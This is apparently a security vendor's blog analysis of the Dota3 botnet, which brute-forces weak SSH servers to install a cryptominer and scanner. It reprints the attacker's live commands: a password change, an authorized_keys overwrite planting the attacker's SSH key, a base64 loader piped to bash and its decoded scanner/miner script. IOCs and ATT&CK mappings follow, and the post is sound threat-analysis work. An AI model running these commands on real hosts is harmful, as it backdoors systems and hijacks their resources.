Skip to content

Dota3 Malware Again and Again

Home News & Blogs Dota3 Malware Again and Again

The Internet is plagued by automated systems that search for servers with weak credentials to infect with their malware. In this blog post, we will analyze a well-known malware that has been active for years: Dota. In the Dota family of malware, there have been different variants, and using data gathered by one of our servers deployed over the Internet, we have recently observed that Dota3, the latest variant, is still active.

 

Dota3

Dota3 is a malware of the dota family. It is based on a botnet that attacks weak SSH servers using dictionaries with default or common credentials.

Once they obtain a valid authentication, they execute a series of commands to obtain some information about the compromised system, such as number of CPU cores, cron tasks, or memory information. Also, they change the user password to a random string where they store it in /tmp/up.txt. Finally, with the goal of maintaining persistence with the compromised host they add their ssh key into the user’s authorized_keys.

 

cat /proc/cpuinfo | grep name | wc -l
‘echo -e "ubuntu123\nN2a96PU0mBfS\nN2a96PU0mBfS"|passwd|bash’ >> up.txt
cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
ls -lh $(which ls)
crontab -l 
w
uname -m
cat /proc/cpuinfo | grep model | grep name | wc -l
top
uname -a
lscpu | grep Model
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

 

They immediately upload a file called dota3.tar.gz to the compromised host via SFTP and execute the following command, encoded in base64, to initialize this actor’s malware:

echo 'IyEvYmluL2Jhc2gKY2QgL3RtcAkKcm0gLXJmIC5zc2gKcm0gLXJmIC5tb3VudGZzCnJtIC1yZiAuWDEzLXVuaXgKcm0gLXJmIC5YMTctdW5peApybSAtcmYgLlgxOS11bml4CnJtIC1yZiAuWDIqCm1rZGlyIC5YMjYtdW5peApjZCAuWDI2LXVuaXgKdW56aXAgWDI2LXVuaXguemlwCm12IC92YXIvdG1wL2RvdGEzLnRhci5neiBkb3RhMy50YXIuZ3oKdGFyIHhmIGRvdGEzLnRhci5negpzbGVlcCAzcyAmJiBjZCAvdG1wLy5YMjYtdW5peC8ucnN5bmMvYwpub2h1cCAvdG1wLy5YMjYtdW5peC8ucnN5bmMvYy90c20gLXQgMTUwIC1TIDYgLXMgNiAtcCAyMiAtUCAwIC1mIDAgLWsgMSAtbCAxIC1pIDAgL3RtcC91cC50eHQgMTkyLjE2OCA+PiAvZGV2L251bGwgMj4xJgpzbGVlcCA4bSAmJiBub2h1cCAvdG1wLy5YMjYtdW5peC8ucnN5bmMvYy90c20gLXQgMTUwIC1TIDYgLXMgNiAtcCAyMiAtUCAwIC1mIDAgLWsgMSAtbCAxIC1pIDAgL3RtcC91cC50eHQgMTcyLjE2ID4+IC9kZXYvbnVsbCAyPjEmCnNsZWVwIDIwbSAmJiBjZCAuLjsgL3RtcC8uWDI2LXVuaXgvLnJzeW5jL2luaXRhbGwgMj4xJgpleGl0IDAK==' | base64 --decode | bash

 

It is a script that first runs a series of commands to remove some directories in case this server has been compromised before.

rm -rf .ssh
rm -rf .mountfs
rm -rf .X13-unix
rm -rf .X17-unix
rm -rf .X19-unix
rm -rf .X2*

 

Then they create a hidden directory called X26-unix and they unzip the file uploaded in the previous step (dota3.tar.gz) in this directory.

unzip X26-unix.zip
mv /var/tmp/dota3.tar.gz dota3.tar.gz
tar xf dota3.tar.gz

 

Finally, they start scanning over the Internet and they initialize their XMRIg by executing the following commands.

sleep 3s && cd /tmp/.X26-unix/.rsync/c
nohup /tmp/.X26-unix/.rsync/c/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 192.168 >> /dev/null 2>1&
sleep 8m && nohup /tmp/.X26-unix/.rsync/c/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 172.16 >> /dev/null 2>1&
sleep 20m && cd ..; /tmp/.X26-unix/.rsync/initall 2>1&

 

Here is the whole script decoded:

#!/bin/bash
cd /tmp 
rm -rf .ssh
rm -rf .mountfs
rm -rf .X13-unix
rm -rf .X17-unix
rm -rf .X19-unix
rm -rf .X2*
mkdir .X26-unix
cd .X26-unix
unzip X26-unix.zip
mv /var/tmp/dota3.tar.gz dota3.tar.gz
tar xf dota3.tar.gz
sleep 3s && cd /tmp/.X26-unix/.rsync/c
nohup /tmp/.X26-unix/.rsync/c/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 192.168 >> /dev/null 2>1&
sleep 8m && nohup /tmp/.X26-unix/.rsync/c/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 172.16 >> /dev/null 2>1&
sleep 20m && cd ..; /tmp/.X26-unix/.rsync/initall 2>1&
exit 0

MITRE ATT&CK Techniques

Cataloguing the threat actor’s TTPs with MITRE ATT&CK’s matrix can help teams mitigate risk and stop attacks. These are the MITRE ATT&CK techniques observed in CC0631’s behavior:

Automatic TTP capturing from CounterCraft’s Deception Platform

Command and Scripting Interpreter – Unix Shell (T1059.004): attackers abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh…) depending on the specific distribution.

System Service Discovery (T1007): attackers try to get information about registered services. Commands that obtain information about services using operating system utilities.

Account Manipulation – SSH Authorized Keys (T1098.004): attackers modify the SSH authorized_keys file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of ssh sessions for remote management.

Indicator Removal on Host – File Deletion (T1070.004): attackers delete files left behind by the actions of their intrusion activity. Malware, tools. Or other non-native files dropped or created on a system by an adversary may leave traces to indicate what was done within a network and how.

Resource Hijacking (T1496): attackers leverage the resources of co-opted systems in order to solve resource intensive problems which may impact system and/or hosted service availability. One common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual curren

 

IOCs

Filename Filepath SHA-256
dota3.tar.gz /var/tmp/dota3.tar.gz a1747edddcf4f9807effc4bbca21df11694bc313761a0135293d2339d38f7677
1 /tmp/X26-unix/.rsync/1 5c30e26438b16a05c04502633d4769f7b01fa033a30da1c42d03f45dd60bbcd1
init /tmp/X26-unix/.rsync/init 6c3990e72e13938828aca0c02d4c098dee3fc1b31c28b0fd229d7bf7ffca0f28
init2 /tmp/X26-unix/.rsync/init2 eb019aecd3f4b0f0d94d26c576e323cc7c2331e59087e8aa2478aa72b36563eb
initall /tmp/X26-unix/.rsync/initall befdf0be5b811621a72eddafad1886321102be1ec3417030888371c5554d9d1a
dir.dir /tmp/X26-unix/.rsync/dir.dir e0646376ba022eef311d67907ff0214df7db1396134a6ccfd182d448e7f18f62
a /tmp/X26-unix/.rsync/a/a 9d4fef06b12d18385f1c45dd4e37f031c6590b080ea5446ff7a5bac491daea50
cron /tmp/X26-unix/.rsync/a/cron 59eb24690f25be9e349e3e1e4cd51ed6add1f5874111e5bc5b436ee93fe7e0d9
init0 /tmp/X26-unix/.rsync/a/init0 99def4ea5caa774f4c090f9b44d96c56735a0970b60e18a57386ad55542cdfa4
run /tmp/X26-unix/.rsync/a/run 3e00ba1fdc57a87156e30cd896b908fc3f1775bb5ffd411c027ae519fc42c330
stop /tmp/X26-unix/.rsync/a/stop c047dffd230ab103f2cb0377918575b20be34a4f3de3b2c8be0821ceb47de157
a /tmp/X26-unix/.rsync/b/a dc43fdfbb5f7e8ecc80353dcd85889c0c08483c99acbce35b3ed8f399c936920
run /tmp/X26-unix/.rsync/b/run 38c6728331722a081493464ca2d890b7b07358fdfdf1fb7f04f690173b296966
stop /tmp/X26-unix/.rsync/b/stop c3b5118e534ee34639e438670695ba9e93db918d7d3160a302cef0a14a10e3b1
a /tmp/X26-unix/.rsync/c/a 6f44d32649344da4aad485abb95579f708d79b184a61160b25f688c6e7cbb3b4
aptitude /tmp/X26-unix/.rsync/c/aptitude dce6df3c84f02f37900d61a13e3358af98e05193c1142bc9784ab15ab97a2e6a
b /tmp/X26-unix/.rsync/c/b b82838c66b0516a89674640c999970507b59a69945465edcc1c9125295ce47d4
dir.dir /tmp/X26-unix/.rsync/c/dir.dir 89812d2d7b09e5136ed9217eb4df86b6d5a295cbc92324b721a0d06ad3eca69d
go /tmp/X26-unix/.rsync/c/go b0ea5caa1ad79b799a2f23dd17d9c575901c868026615d56f31e6738809a9655
golan /tmp/X26-unix/.rsync/c/golan 1cc9c6a2c0f2f41900c345b0216023ed51d4e782ed61ed5e39eb423fb2f1ddd8
ip /tmp/X26-unix/.rsync/c/ip 449ec4d688b15fcb6cf3d4e8b90e905dfd225bc8ec2c3f1cc134af405876a8d9
n /tmp/X26-unix/.rsync/c/n 4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865
p /tmp/X26-unix/.rsync/c/p ec668dc65c802b271e4f0caa4148538aa293eab8998e27e7c617c6bef4d749c2
run /tmp/X26-unix/.rsync/c/run 997803d379b42bc2913b5a93cff09f544583b7eac313d66c7602cbc8f2b310b5
slow /tmp/X26-unix/.rsync/c/slow b92e77fdc4aa3181ed62b2d0e58298f51f2993321580c8d2e3368ef8d6944364
sshd /tmp/X26-unix/.rsync/c/sshd 4c68f638b2d30615e7e8e2a9ef04fcc6f9b18cb0616430b2e0461f8946f900a2
start /tmp/X26-unix/.rsync/c/start 9dbbc9b5d7793425968e42e995226c5f9fe32e502a0a694320a5e838d57c8836
stop /tmp/X26-unix/.rsync/c/stop e431d806f4ded2c8f77da603e2d7e89c5fbef9a5e0c732b561dccca721efdb2d
v /tmp/X26-unix/.rsync/c/v e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
watchdog /tmp/X26-unix/.rsync/c/wathcdog f95c1c076b2d78834cc62edd2f4c4f2f6bfa21d07d07853274805859e20261ba

Conclusion

Over the last few years, the structure of the files that this actor downloaded to be executed has changed. But as we have seen, this variant has not changed much compared to the previous ones. The goal is still the same: attack a server with weak credentials, gain persistence by entering their key in the authorized_keys file, install an XMRig and install a scanner that starts scanning the Internet. To prevent this type of actor, the best solution is to secure your SSH services:

  • Only allow SSH inbound connections from specific remote ip addresses.

 

These steps are still some of the best ways to prevent Dota malware and to keep systems secure.

Did you find this interesting? Check out more recent intel here.


About the Author

John Requejo, integration engineer at CounterCraft, works tirelessly to attract attackers to the deception environment and also analyze their behavior. You can find him on LinkedIn.